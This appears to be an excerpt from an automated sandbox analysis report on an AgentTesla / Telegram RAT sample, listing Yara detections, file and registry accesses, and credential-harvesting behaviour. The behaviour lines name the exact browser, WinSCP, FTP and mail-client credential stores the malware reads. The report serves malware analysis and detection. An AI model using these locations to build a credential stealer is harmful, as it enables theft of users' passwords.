Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Queries volume information: C:\Users\user\AppData\Roaming\eFzAvsOm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Queries volume information: C:\Users\user\AppData\Roaming\eFzAvsOm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 10.2.eFzAvsOm.exe.3e9e460.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2944094662.0000000002FF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2945148313.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2945148313.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2944094662.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eFzAvsOm.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eFzAvsOm.exe PID: 8104, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.eFzAvsOm.exe.3e9e460.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eFzAvsOm.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eFzAvsOm.exe PID: 8104, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 10.2.eFzAvsOm.exe.3e9e460.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eFzAvsOm.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eFzAvsOm.exe PID: 8104, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 10.2.eFzAvsOm.exe.3e9e460.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2944094662.0000000002FF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2945148313.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2945148313.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2944094662.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eFzAvsOm.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eFzAvsOm.exe PID: 8104, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 10.2.eFzAvsOm.exe.3e9e460.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.eFzAvsOm.exe.3e9e460.1.raw.unpack, type: UNPACKEDPE
